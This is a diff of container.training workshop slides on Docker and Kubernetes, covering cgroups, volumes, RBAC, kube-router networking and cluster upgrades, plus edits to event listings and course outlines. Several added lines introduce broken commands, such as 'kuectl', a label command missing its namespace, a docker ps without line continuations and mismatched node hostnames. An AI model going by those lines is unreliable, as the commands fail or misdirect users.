@@ -947,7 +947,7 @@ Killed
 
   (i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)
 
-- Allows setting relative weights used by the scheduler.
+- Allows to set relative weights used by the scheduler.
 
 ---
 
@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.
 
 - Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.
 
-- The seccomp-bpf extension allows specifying custom filters with BPF rules.
+- The seccomp-bpf extension allows to specify custom filters with BPF rules.
 
-- This allows filtering by syscall, and by parameter.
+- This allows to filter by syscall, and by parameter.
 
 - BPF code can perform arbitrarily complex checks, quickly, and safely.
 

slides/containers/Orchestration_Overview.md

@@ -6,6 +6,8 @@ In this chapter, we will:
 
 * Present (from a high-level perspective) some orchestrators.
 
+* Show one orchestrator (Kubernetes) in action.
+
 ---
 
 class: pic
@@ -119,7 +121,7 @@ Now, how are things for our IAAS provider?
 - Solution: *migrate* VMs and shutdown empty servers
   
   (e.g. combine two hypervisors with 40% load into 80%+0%,
-  <br/>and shut down the one at 0%)
+  <br/>and shutdown the one at 0%)
 
 ---
 
@@ -127,7 +129,7 @@ Now, how are things for our IAAS provider?
 
 How do we implement this?
 
-- Shut down empty hosts (but keep some spare capacity)
+- Shutdown empty hosts (but keep some spare capacity)
 
 - Start hosts again when capacity gets low
 
@@ -175,7 +177,7 @@ In practice, these goals often conflict.
 
   - 16 GB RAM, 8 cores, 1 TB disk
 
-- Each week, your team requests:
+- Each week, your team asks:
 
   - one VM with X RAM, Y CPU, Z disk
 

slides/containers/Resource_Limits.md

@@ -72,7 +72,7 @@
 
 - For memory usage, the mechanism is part of the *cgroup* subsystem.
 
-- This subsystem allows limiting the memory for a process or a group of processes.
+- This subsystem allows to limit the memory for a process or a group of processes.
 
 - A container engine leverages these mechanisms to limit memory for a container.
 

slides/containers/Training_Environment.md

@@ -45,13 +45,13 @@ individual Docker VM.*
 
 - The Docker Engine is a daemon (a service running in the background).
 
-- This daemon manages containers, the same way that a hypervisor manages VMs.
+- This daemon manages containers, the same way that an hypervisor manages VMs.
 
 - We interact with the Docker Engine by using the Docker CLI.
 
 - The Docker CLI and the Docker Engine communicate through an API.
 
-- There are many other programs and client libraries which use that API.
+- There are many other programs, and many client libraries, to use that API.
 
 ---
 

slides/containers/Working_With_Volumes.md

@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:
 
 * Sharing a *single file* between the host and a container.
 
-* Using remote storage and custom storage with *volume drivers*.
+* Using remote storage and custom storage with "volume drivers".
 
 ---
 
 ## Volumes are special directories in a container
 
-Volumes can be declared in two different ways:
+Volumes can be declared in two different ways.
 
 * Within a `Dockerfile`, with a `VOLUME` instruction.
 
@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.
 
 * Volumes are used with the `-v` option.
 
-* When a host path does not contain a `/`, it is considered a volume name.
+* When a host path does not contain a /, it is considered to be a volume name.
 
 Let's start a web server using the two previous volumes.
 
@@ -189,7 +189,7 @@ $ curl localhost:1234
 
 * In this example, we will run a text editor in the other container.
 
-  (But this could be an FTP server, a WebDAV server, a Git receiver...)
+  (But this could be a FTP server, a WebDAV server, a Git receiver...)
 
 Let's start another container using the `webapps` volume.
 

slides/index.yaml

@@ -1,46 +1,3 @@
-- date: [2019-11-04, 2019-11-05]
-  country: de
-  city: Berlin
-  event: Velocity
-  speaker: jpetazzo
-  title: Deploying and scaling applications with Kubernetes
-  attend: https://conferences.oreilly.com/velocity/vl-eu/public/schedule/detail/79109
-
-- date: 2019-11-13
-  country: fr
-  city: Marseille
-  event: DevopsDDay
-  speaker: jpetazzo
-  title: Déployer ses applications avec Kubernetes (in French)
-  lang: fr
-  attend: http://2019.devops-dday.com/Workshop.html
-
-- date: [2019-09-24, 2019-09-25]
-  country: fr
-  city: Paris
-  event: ENIX SAS
-  speaker: jpetazzo
-  title: Déployer ses applications avec Kubernetes (in French)
-  lang: fr
-  attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
-
-- date: 2019-06-17
-  country: ca
-  city: Montréal
-  event: Zenika
-  speaker: jpetazzo
-  title: Getting Started With Kubernetes
-  attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
-
-- date: [2019-06-10, 2019-06-11]
-  city: San Jose, CA
-  country: us
-  event: Velocity
-  title: Kubernetes for administrators and operators
-  speaker: jpetazzo
-  attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
-  slides: https://kadm-2019-06.container.training/
-
 - date: 2019-05-01
   country: us
   city: Cleveland, OH
@@ -48,8 +5,6 @@
   speaker: jpetazzo, s0ulshake
   title: Getting started with Kubernetes and container orchestration
   attend: https://us.pycon.org/2019/schedule/presentation/74/
-  slides: https://pycon2019.container.training/
-  video: https://www.youtube.com/watch?v=J08MrW2NC1Y
 
 - date: 2019-04-28
   country: us
@@ -58,7 +13,6 @@
   speaker: jpetazzo
   title: Getting Started With Kubernetes and Container Orchestration
   attend: https://gotochgo.com/2019/workshops/148
-  slides: https://gotochgo2019.container.training/
 
 - date: 2019-04-26
   country: fr
@@ -67,7 +21,6 @@
   speaker: jpetazzo
   title: Opérer et administrer Kubernetes
   attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
-  slides: https://kadm-2019-04.container.training/
 
 - date: [2019-04-23, 2019-04-24]
   country: fr
@@ -77,7 +30,6 @@
   title: Déployer ses applications avec Kubernetes (in French)
   lang: fr
   attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
-  slides: https://kube-2019-04.container.training/
 
 - date: [2019-04-15, 2019-04-16]
   country: fr
@@ -87,7 +39,7 @@
   title: Bien démarrer avec les conteneurs (in French)
   lang: fr
   attend: https://enix.io/fr/services/formation/bien-demarrer-avec-les-conteneurs/
-  slides: http://intro-2019-04.container.training/
+  slides: http://intro-2019-04.container.training
 
 - date: 2019-03-08
   country: uk

slides/intro-fullday.yml

@@ -0,0 +1,85 @@
+title: |
+  Introduction
+  to Containers
+
+chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
+#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
+
+gitrepo: github.com/jpetazzo/container.training
+
+slides: http://container.training/
+
+exclude:
+- self-paced
+
+chapters:
+- shared/title.md
+- logistics.md
+- containers/intro.md
+- shared/about-slides.md
+- shared/toc.md
+- - containers/Docker_Overview.md
+  #- containers/Docker_History.md
+  - containers/Training_Environment.md
+  - containers/Installing_Docker.md
+  - containers/First_Containers.md
+  - containers/Background_Containers.md
+  - containers/Start_And_Attach.md
+- - containers/Initial_Images.md
+  - containers/Building_Images_Interactively.md
+  - containers/Building_Images_With_Dockerfiles.md
+  - containers/Cmd_And_Entrypoint.md
+- - containers/Copying_Files_During_Build.md
+  - |
+      # Exercise — writing Dockerfiles
+
+      Let's write Dockerfiles for an existing application!
+
+      The code is at: https://github.com/jpetazzo/wordsmith
+
+  - containers/Multi_Stage_Builds.md
+  - containers/Publishing_To_Docker_Hub.md
+  - containers/Dockerfile_Tips.md
+  - |
+      # Exercise — writing better Dockerfiles
+
+      Let's update our Dockerfiles to leverage multi-stage builds!
+
+      The code is at: https://github.com/jpetazzo/wordsmith
+
+      Use a different tag for these images, so that we can compare their sizes.
+
+      What's the size difference between single-stage and multi-stage builds?
+
+- - containers/Naming_And_Inspecting.md
+  - containers/Labels.md
+  - containers/Getting_Inside.md
+  - containers/Resource_Limits.md
+- - containers/Container_Networking_Basics.md
+  - containers/Network_Drivers.md
+  - containers/Container_Network_Model.md
+  #- containers/Connecting_Containers_With_Links.md
+  - containers/Ambassadors.md
+- - containers/Local_Development_Workflow.md
+  - containers/Windows_Containers.md
+  - containers/Working_With_Volumes.md
+  - containers/Compose_For_Dev_Stacks.md
+  - |
+      # Exercise — writing a Compose file
+
+      Let's write a Compose file for the wordsmith app!
+
+      The code is at: https://github.com/jpetazzo/wordsmith
+
+- - containers/Docker_Machine.md
+  - containers/Advanced_Dockerfiles.md
+  - containers/Application_Configuration.md
+  - containers/Logging.md
+- - containers/Namespaces_Cgroups.md
+  - containers/Copy_On_Write.md
+  #- containers/Containers_From_Scratch.md
+- - containers/Container_Engines.md
+  #- containers/Ecosystem.md
+  - containers/Orchestration_Overview.md
+  - shared/thankyou.md
+  - containers/links.md

slides/intro-selfpaced.yml

@@ -1,62 +1,60 @@
 title: |
-  Containers,
-  Docker,
-  Kubernetes
-  (Partie 1)
+  Introduction
+  to Containers
 
-#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
-chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
+chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
+#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
 
 gitrepo: github.com/jpetazzo/container.training
 
-slides: http://alfun-2019-06.container.training/
+slides: http://container.training/
 
 exclude:
-- self-paced
+- in-person
 
 chapters:
 - shared/title.md
-- logistics.md
+# - shared/logistics.md
 - containers/intro.md
 - shared/about-slides.md
 - shared/toc.md
-# DAY 1
 - - containers/Docker_Overview.md
+  - containers/Docker_History.md
   - containers/Training_Environment.md
   - containers/Installing_Docker.md
   - containers/First_Containers.md
   - containers/Background_Containers.md
-- - containers/Start_And_Attach.md
-  - containers/Initial_Images.md
+  - containers/Start_And_Attach.md
+- - containers/Initial_Images.md
   - containers/Building_Images_Interactively.md
   - containers/Building_Images_With_Dockerfiles.md
   - containers/Cmd_And_Entrypoint.md
-- - containers/Copying_Files_During_Build.md
-  - containers/Exercise_Dockerfile_Basic.md
+  - containers/Copying_Files_During_Build.md
+- - containers/Multi_Stage_Builds.md
   - containers/Publishing_To_Docker_Hub.md
-  - containers/Multi_Stage_Builds.md
   - containers/Dockerfile_Tips.md
-  - containers/Exercise_Dockerfile_Advanced.md
 - - containers/Naming_And_Inspecting.md
   - containers/Labels.md
   - containers/Getting_Inside.md
-  - containers/Resource_Limits.md
-# DAY 2
 - - containers/Container_Networking_Basics.md
   - containers/Network_Drivers.md
   - containers/Container_Network_Model.md
+  #- containers/Connecting_Containers_With_Links.md
   - containers/Ambassadors.md
 - - containers/Local_Development_Workflow.md
+  - containers/Windows_Containers.md
   - containers/Working_With_Volumes.md
   - containers/Compose_For_Dev_Stacks.md
-  - containers/Exercise_Composefile.md
+  - containers/Docker_Machine.md
 - - containers/Advanced_Dockerfiles.md
   - containers/Application_Configuration.md
   - containers/Logging.md
-  - containers/Container_Engines.md
-  - containers/Windows_Containers.md
-- - containers/Orchestration_Overview.md
-  - k8s/concepts-k8s.md
-  - shared/declarative.md
-  - k8s/declarative.md
-  - k8s/kubenet.md
+  - containers/Resource_Limits.md
+- - containers/Namespaces_Cgroups.md
+  - containers/Copy_On_Write.md
+  #- containers/Containers_From_Scratch.md
+- - containers/Container_Engines.md
+  - containers/Ecosystem.md
+  - containers/Orchestration_Overview.md
+  - shared/thankyou.md
+  - containers/links.md

slides/k8s/architecture.md

@@ -165,25 +165,6 @@ What does that mean?
 
 ---
 
-## Let's experiment a bit!
-
-- For the exercises in this section, connect to the first node of the `test` cluster
-
-.exercise[
-
-- SSH to the first node of the test cluster
-
-- Check that the cluster is operational:
-  ```bash
-  kubectl get nodes
-  ```
-
-- All nodes should be `Ready`
-
-]
-
----
-
 ## Create
 
 - Let's create a simple object
@@ -214,7 +195,7 @@ This is equivalent to `kubectl create namespace hello`.
 
 - Read back our object:
   ```bash
-  kubectl get namespace hello -o yaml
+  kuectl get namespace hello -o yaml
   ```
 
 ]
@@ -307,7 +288,7 @@ class: extra-details
 
 - In the other, update our namespace:
   ```bash
-  kubectl label namespaces hello color=purple
+  kubectl label namespaces color=purple
   ```
 
 ]
@@ -356,9 +337,9 @@ We demonstrated *update* and *watch* semantics.
 
   - we create a Deployment object
 
-  - the Deployment controller notices it, and creates a ReplicaSet
+  - the Deployment controller notices it, creates a ReplicaSet
 
-  - the ReplicaSet controller notices the ReplicaSet, and creates a Pod
+  - the ReplicaSet controller notices it, creates a Pod
 
 ---
 

slides/k8s/authn-authz.md

@@ -1,4 +1,4 @@
-# Authentication and authorization
+# Authentication and authorization (bonus)
 
 *And first, a little refresher!*
 
@@ -22,7 +22,7 @@
 
 - When the API server receives a request, it tries to authenticate it
 
-  (it examines headers, certificates... anything available)
+  (it examines headers, certificates ... anything available)
 
 - Many authentication methods are available and can be used simultaneously
 
@@ -34,7 +34,7 @@
   - the user ID
   - a list of groups
 
-- The API server doesn't interpret these; that'll be the job of *authorizers*
+- The API server doesn't interpret these; it'll be the job of *authorizers*
 
 ---
 
@@ -50,7 +50,7 @@
 
 - [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)
 
-  (carrying user and password in an HTTP header)
+  (carrying user and password in a HTTP header)
 
 - Authentication proxy
 
@@ -88,7 +88,7 @@
 
   (i.e. they are not stored in etcd or anywhere else)
 
-- Users can be created (and added to groups) independently of the API
+- Users can be created (and given membership to groups) independently of the API
 
 - The Kubernetes API can be set up to use your custom CA to validate client certs
 
@@ -143,21 +143,19 @@ class: extra-details
 
   (see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
 
-- As a result, we don't have an easy way to terminate someone's access
+- As a result, we cannot easily suspend a user's access
 
-  (if their key is compromised, or they leave the organization)
+- There are workarounds, but they are very inconvenient:
 
-- Option 1: re-create a new CA and re-issue everyone's certificates 
-  <br/>
-  → Maybe OK if we only have a few users; no way otherwise
+  - issue short-lived certificates (e.g. 24 hours) and regenerate them often
 
-- Option 2: don't use groups; grant permissions to individual users
-  <br/>
-  → Inconvenient if we have many users and teams; error-prone
+  - re-create the CA and re-issue all certificates in case of compromise
 
-- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
-  <br/>
-  → This can be facilitated by e.g. Vault or by the Kubernetes CSR API
+  - grant permissions to individual users, not groups
+    <br/>
+    (and remove all permissions to a compromised user)
+
+- Until this is fixed, we probably want to use other methods
 
 ---
 
@@ -193,7 +191,7 @@ class: extra-details
 
   (the kind that you can view with `kubectl get secrets`)
 
-- Service accounts are generally used to grant permissions to applications, services...
+- Service accounts are generally used to grant permissions to applications, services ...
 
   (as opposed to humans)
 
@@ -217,7 +215,7 @@ class: extra-details
 
 .exercise[
 
-- The resource name is `serviceaccount` or `sa` for short:
+- The resource name is `serviceaccount` or `sa` in short:
   ```bash
   kubectl get sa
   ```
@@ -309,7 +307,7 @@ class: extra-details
 
 - The API "sees" us as a different user
 
-- But neither user has any rights, so we can't do nothin'
+- But neither user has any right, so we can't do nothin'
 
 - Let's change that!
 
@@ -339,9 +337,9 @@ class: extra-details
 
 - A rule is a combination of:
 
-  - [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...
+  - [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete ...
 
-  - resources (as in "API resource," like pods, nodes, services...)
+  - resources (as in "API resource", like pods, nodes, services ...)
 
   - resource names (to specify e.g. one specific pod instead of all pods)
 
@@ -375,13 +373,13 @@ class: extra-details
 
 - We can also define API resources ClusterRole and ClusterRoleBinding
 
-- These are a superset, allowing us to:
+- These are a superset, allowing to:
 
   - specify actions on cluster-wide objects (like nodes)
 
   - operate across all namespaces
 
-- We can create Role and RoleBinding resources within a namespace
+- We can create Role and RoleBinding resources within a namespaces
 
 - ClusterRole and ClusterRoleBinding resources are global
 
@@ -389,13 +387,13 @@ class: extra-details
 
 ## Pods and service accounts
 
-- A pod can be associated with a service account
+- A pod can be associated to a service account
 
-  - by default, it is associated with the `default` service account
+  - by default, it is associated to the `default` service account
 
-  - as we saw earlier, this service account has no permissions anyway
+  - as we've seen earlier, this service account has no permission anyway
 
-- The associated token is exposed to the pod's filesystem
+- The associated token is exposed into the pod's filesystem
 
   (in `/var/run/secrets/kubernetes.io/serviceaccount/token`)
 
@@ -409,7 +407,7 @@ class: extra-details
 
 - We are going to create a service account
 
-- We will use a default cluster role (`view`)
+- We will use an existing cluster role (`view`)
 
 - We will bind together this role and this service account
 
@@ -460,7 +458,7 @@ class: extra-details
 
 ]
 
-It's important to note a couple of details in these flags...
+It's important to note a couple of details in these flags ...
 
 ---
 
@@ -493,13 +491,13 @@ It's important to note a couple of details in these flags...
 
   - again, the command would have worked fine (no error)
 
-  - ...but our API requests would have been denied later
+  - ... but our API requests would have been denied later
 
 - What's about the `default:` prefix?
 
   - that's the namespace of the service account
 
-  - yes, it could be inferred from context, but... `kubectl` requires it
+  - yes, it could be inferred from context, but ... `kubectl` requires it
 
 ---
 
@@ -576,51 +574,6 @@ It's important to note a couple of details in these flags...
 
 class: extra-details
 
-## Where does this `view` role come from?
-
-- Kubernetes defines a number of ClusterRoles intended to be bound to users
-
-- `cluster-admin` can do *everything* (think `root` on UNIX)
-
-- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
-
-- `edit` is similar to `admin`, but cannot view or edit permissions
-
-- `view` has read-only access to most resources, except permissions and secrets
-
-*In many situations, these roles will be all you need.*
-
-*You can also customize them!*
-
----
-
-class: extra-details
-
-## Customizing the default roles
-
-- If you need to *add* permissions to these default roles (or others),
-  <br/>
-  you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
-
-- This happens by creating a ClusterRole with the following labels:
-  ```yaml
-    metadata:
-      labels:
-        rbac.authorization.k8s.io/aggregate-to-admin: "true"
-        rbac.authorization.k8s.io/aggregate-to-edit: "true"
-        rbac.authorization.k8s.io/aggregate-to-view: "true"
-  ```
-
-- This ClusterRole permissions will be added to `admin`/`edit`/`view` respectively
-
-- This is particulary useful when using CustomResourceDefinitions
-
-  (since Kubernetes cannot guess which resources are sensitive and which ones aren't)
-
----
-
-class: extra-details
-
 ## Where do our permissions come from?
 
 - When interacting with the Kubernetes API, we are using a client certificate
@@ -652,7 +605,7 @@ class: extra-details
   kubectl describe clusterrolebinding cluster-admin
   ```
 
-- This binding associates `system:masters` with the cluster role `cluster-admin`
+- This binding associates `system:masters` to the cluster role `cluster-admin`
 
 - And the `cluster-admin` is, basically, `root`:
   ```bash
@@ -667,7 +620,7 @@ class: extra-details
 
 - For auditing purposes, sometimes we want to know who can perform an action
 
-- There is a proof-of-concept tool by Aqua Security which does exactly that:
+- Here is a proof-of-concept tool by Aqua Security, doing exactly that:
 
   https://github.com/aquasecurity/kubectl-who-can
 

slides/k8s/cloud-controller-manager.md

@@ -20,15 +20,15 @@
 
 - Configuring routing tables in the cloud network (specific to GCE)
 
-- Updating node labels to indicate region, zone, instance type...
+- Updating node labels to indicate region, zone, instance type ...
 
 - Obtain node name, internal and external addresses from cloud metadata service
 
 - Deleting nodes from Kubernetes when they're deleted in the cloud
 
-- Managing *some* volumes (e.g. ELBs, AzureDisks...)
+- Managing *some* volumes (e.g. ELBs, AzureDisks ...)
 
-  (Eventually, volumes will be managed by the Container Storage Interface)
+  (Eventually, volumes will be managed by the CSI)
 
 ---
 
@@ -83,7 +83,7 @@ The list includes the following providers:
 
 ## Audience questions
 
-- What kind of clouds are you using/planning to use?
+- What kind of clouds are you using / planning to use?
 
 - What kind of details would you like to see in this section?
 
@@ -105,7 +105,7 @@ The list includes the following providers:
 
 - When using managed clusters, this is done automatically
 
-- There is very little documentation on writing the configuration file
+- There is very little documentation to write the configuration file
 
   (except for OpenStack)
 
@@ -123,7 +123,7 @@ The list includes the following providers:
 
 - To get these addresses, the node needs to communicate with the control plane
 
-- ...Which means joining the cluster
+- ... Which means joining the cluster
 
 (The problem didn't occur when cloud-specific code was running in kubelet: kubelet could obtain the required information directly from the cloud provider's metadata service.)
 

slides/k8s/cluster-backup.md

@@ -6,7 +6,7 @@
 
   - error recovery (human or process has altered or corrupted data)
 
-  - cloning environments (for testing, validation...)
+  - cloning environments (for testing, validation ...)
 
 - Let's see the strategies and tools available with Kubernetes!
 
@@ -18,13 +18,13 @@
 
   (it gives us replication primitives)
 
-- Kubernetes helps us clone / replicate environments
+- Kubernetes helps us to clone / replicate environments
 
   (all resources can be described with manifests)
 
 - Kubernetes *does not* help us with error recovery
 
-- We still need to back up/snapshot our data:
+- We still need to backup / snapshot our data:
 
   - with database backups (mysqldump, pgdump, etc.)
 
@@ -58,7 +58,7 @@
 
 - If our deployment system isn't fully automated, it should at least be documented
 
-- Litmus test: how long does it take to deploy a cluster...
+- Litmus test: how long does it take to deploy a cluster ...
 
   - for a senior engineer?
 
@@ -66,7 +66,7 @@
 
 - Does it require external intervention?
 
-  (e.g. provisioning servers, signing TLS certs...)
+  (e.g. provisioning servers, signing TLS certs ...)
 
 ---
 
@@ -108,7 +108,7 @@
 
 - For real applications: add resources (as YAML files)
 
-- For applications deployed multiple times: Helm, Kustomize...
+- For applications deployed multiple times: Helm, Kustomize ...
 
   (staging and production count as "multiple times")
 

slides/k8s/cluster-upgrade.md

@@ -18,8 +18,6 @@
 
 .exercise[
 
-- Log into node `test1`
-
 - Check the version of kubectl and of the API server:
   ```bash
   kubectl version
@@ -166,7 +164,7 @@
 
 - Upgrade kubelet:
   ```bash
-  apt install kubelet=1.14.2-00
+  apt install kubelet=1.14.1-00
   ```
 
 ]
@@ -267,7 +265,7 @@
 
 - Perform the upgrade:
   ```bash
-  sudo kubeadm upgrade apply v1.14.2
+  sudo kubeadm upgrade apply v1.14.1
   ```
 
 ]
@@ -287,8 +285,8 @@
 - Download the configuration on each node, and upgrade kubelet:
   ```bash
     for N in 1 2 3; do
-      ssh test$N sudo kubeadm upgrade node config --kubelet-version v1.14.2
-      ssh test$N sudo apt install kubelet=1.14.2-00
+    	ssh node$N sudo kubeadm upgrade node config --kubelet-version v1.14.1
+  	  ssh node $N sudo apt install kubelet=1.14.1-00
     done
   ```
 ]
@@ -297,7 +295,7 @@
 
 ## Checking what we've done
 
-- All our nodes should now be updated to version 1.14.2
+- All our nodes should now be updated to version 1.14.1
 
 .exercise[
 

slides/k8s/cni.md

@@ -26,7 +26,7 @@
 
 The reference plugins are available [here].
 
-Look in each plugin's directory for its documentation.
+Look into each plugin's directory for its documentation.
 
 [here]: https://github.com/containernetworking/plugins/tree/master/plugins
 
@@ -66,8 +66,6 @@ Look in each plugin's directory for its documentation.
 
 ---
 
-class: extra-details
-
 ## Conf vs conflist
 
 - There are two slightly different configuration formats
@@ -100,7 +98,7 @@ class: extra-details
 
   - CNI_NETNS: path to network namespace file
 
-  - CNI_IFNAME: what the network interface should be named
+  - CNI_IFNAME: how the network interface should be named
 
 - The network configuration must be provided to the plugin on stdin
 
@@ -190,16 +188,12 @@ class: extra-details
 
 - ... But this time, the controller manager will allocate `podCIDR` subnets
 
-  (so that we don't have to manually assign subnets to individual nodes)
+- We will start kube-router with a DaemonSet
 
-- We will create a DaemonSet for kube-router
-
-- We will join nodes to the cluster
-
-- The DaemonSet will automatically start a kube-router pod on each node
+- This DaemonSet will start one instance of kube-router on each node
 
 ---
-
+  
 ## Logging into the new cluster
 
 .exercise[
@@ -227,7 +221,7 @@ class: extra-details
 - It is similar to the one we used with the `kubenet` cluster
 
 - The API server is started with `--allow-privileged`
-
+  
   (because we will start kube-router in privileged pods)
 
 - The controller manager is started with extra flags too:
@@ -260,7 +254,7 @@ class: extra-details
 
 ---
 
-## The kube-router DaemonSet
+## The kube-router DaemonSet 
 
 - In the same directory, there is a `kuberouter.yaml` file
 
@@ -278,7 +272,7 @@ class: extra-details
 
 - The address of the API server will be `http://A.B.C.D:8080`
 
-  (where `A.B.C.D` is the public address of `kuberouter1`, running the control plane)
+  (where `A.B.C.D` is the address of `kuberouter1`, running the control plane)
 
 .exercise[
 
@@ -306,10 +300,12 @@ Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
 
 - Generate the kubeconfig file (replacing `X.X.X.X` with the address of `kuberouter1`):
   ```bash
-    kubectl config set-cluster cni --server http://`X.X.X.X`:8080
-    kubectl config set-context cni --cluster cni
-    kubectl config use-context cni
-    cp ~/.kube/config ~/kubeconfig
+    kubectl --kubeconfig ~/kubeconfig config \
+            set-cluster kubenet --server http://`X.X.X.X`:8080
+    kubectl --kubeconfig ~/kubeconfig config \
+            set-context kubenet --cluster kubenet
+    kubectl --kubeconfig ~/kubeconfig config\
+            use-context kubenet
   ```
 
 ]
@@ -325,7 +321,7 @@ Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
 - Copy `kubeconfig` to the other nodes:
   ```bash
     for N in 2 3; do
-    	scp ~/kubeconfig kuberouter$N:
+    	scp ~/kubeconfig kubenet$N:
     done
   ```
 
@@ -350,8 +346,8 @@ Note: the DaemonSet won't create any pods (yet) since there are no nodes (yet).
 
 - Open more terminals and join the other nodes:
   ```bash
-  ssh kuberouter2 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
-  ssh kuberouter3 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
+  ssh kubenet2 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
+  ssh kubenet3 sudo kubelet --kubeconfig ~/kubeconfig --network-plugin=cni
   ```
 
 ]
@@ -455,7 +451,7 @@ We should see the local pod CIDR connected to `kube-bridge`, and the other nodes
 
 - Or try to exec into one of the kube-router pods:
   ```bash
-  kubectl -n kube-system exec kube-router-xxxxx bash
+  kubectl -n kube-system exec kuber-router-xxxxx bash
   ```
 
 ]
@@ -491,8 +487,8 @@ What does that mean?
 
 - First, get the container ID, with `docker ps` or like this:
   ```bash
-  CID=$(docker ps -q \
-        --filter label=io.kubernetes.pod.namespace=kube-system \
+  CID=$(docker ps
+        --filter label=io.kubernetes.pod.namespace=kube-system
         --filter label=io.kubernetes.container.name=kube-router)
   ```
 
@@ -577,7 +573,7 @@ done
 
 ## Starting the route reflector
 
-- Only do this slide if you are doing this on your own
+- Only do this if you are doing this on your own
 
 - There is a Compose file in the `compose/frr-route-reflector` directory
 
@@ -603,13 +599,13 @@ done
 
 ## Updating kube-router configuration
 
-- We need to pass two command-line flags to the kube-router process
+- We need to add two command-line flags to the kube-router process
 
 .exercise[
 
 - Edit the `kuberouter.yaml` file
 
-- Add the following flags to the kube-router arguments:
+- Add the following flags to the kube-router arguments,:
   ```
   - "--peer-router-ips=`X.X.X.X`"
   - "--peer-router-asns=64512"
@@ -654,8 +650,7 @@ For critical services, we might want to precisely control the update process.
 
 - We can see informative messages in the output of kube-router:
   ```
-  time="2019-04-07T15:53:56Z" level=info msg="Peer Up"
-  Key=X.X.X.X State=BGP_FSM_OPENCONFIRM Topic=Peer
+  time="2019-04-07T15:53:56Z" level=info msg="Peer Up" Key=X.X.X.X State=BGP_FSM_OPENCONFIRM Topic=Peer
   ```
 
 - We should see the routes of the other clusters show up

slides/k8s/concepts-k8s.md

@@ -130,14 +130,6 @@ class: pic
 
 ---
 
-class: pic
-
-![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
-
----
-
-class: extra-details
-
 ## Running the control plane on special nodes
 
 - It is common to reserve a dedicated node for the control plane
@@ -160,8 +152,6 @@ class: extra-details
 
 ---
 
-class: extra-details
-
 ## Running the control plane outside containers
 
 - The services of the control plane can run in or out of containers
@@ -177,12 +167,10 @@ class: extra-details
 
 - In that case, there is no "master node"
 
-*For this reason, it is more accurate to say "control plane" rather than "master."*
+*For this reason, it is more accurate to say "control plane" rather than "master".*
 
 ---
 
-class: extra-details
-
 ## Do we need to run Docker at all?
 
 No!
@@ -199,8 +187,6 @@ No!
 
 ---
 
-class: extra-details
-
 ## Do we need to run Docker at all?
 
 Yes!
@@ -223,8 +209,6 @@ Yes!
 
 ---
 
-class: extra-details
-
 ## Do we need to run Docker at all?
 
 - On our development environments, CI pipelines ... :
@@ -241,21 +225,25 @@ class: extra-details
 
 ---
 
-## Interacting with Kubernetes
+## Kubernetes resources
 
-- We will interact with our Kubernetes cluster through the Kubernetes API
+- The Kubernetes API defines a lot of objects called *resources*
 
-- The Kubernetes API is (mostly) RESTful
-
-- It allows us to create, read, update, delete *resources*
+- These resources are organized by type, or `Kind` (in the API)
 
 - A few common resource types are:
 
   - node (a machine — physical or virtual — in our cluster)
-
   - pod (group of containers running together on a node)
-
   - service (stable network endpoint to connect to one or multiple containers)
+  - namespace (more-or-less isolated group of things)
+  - secret (bundle of sensitive data to be passed to a container)
+ 
+  And much more!
+
+- We can see the full list by running `kubectl api-resources`
+
+  (In Kubernetes 1.10 and prior, the command to list API resources was `kubectl get`)
 
 ---
 
@@ -265,16 +253,22 @@ class: pic
 
 ---
 
+class: pic
+
+![One of the best Kubernetes architecture diagrams available](images/k8s-arch4-thanks-luxas.png)
+
+---
+
 ## Credits
 
-- The first diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
-
-  - it's one of the best Kubernetes architecture diagrams available!
-
-- The second diagram is courtesy of Weave Works
+- The first diagram is courtesy of Weave Works
 
   - a *pod* can have multiple containers working together
 
   - IP addresses are associated with *pods*, not with individual containers
 
+- The second diagram is courtesy of Lucas Käldström, in [this presentation](https://speakerdeck.com/luxas/kubeadm-cluster-creation-internals-from-self-hosting-to-upgradability-and-ha)
+
+  - it's one of the best Kubernetes architecture diagrams available!
+
 Both diagrams used with permission.

slides/k8s/configuration.md

@@ -22,7 +22,7 @@
 
 - There are many ways to pass configuration to code running in a container:
 
-  - baking it into a custom image
+  - baking it in a custom image
 
   - command-line arguments
 
@@ -125,7 +125,7 @@
 
 - We can also use a mechanism called the *downward API*
 
-- The downward API allows exposing pod or container information
+- The downward API allows to expose pod or container information
 
   - either through special files (we won't show that for now)
 
@@ -436,7 +436,7 @@ We should see connections served by Google, and others served by IBM.
 
 - We are going to store the port number in a configmap
 
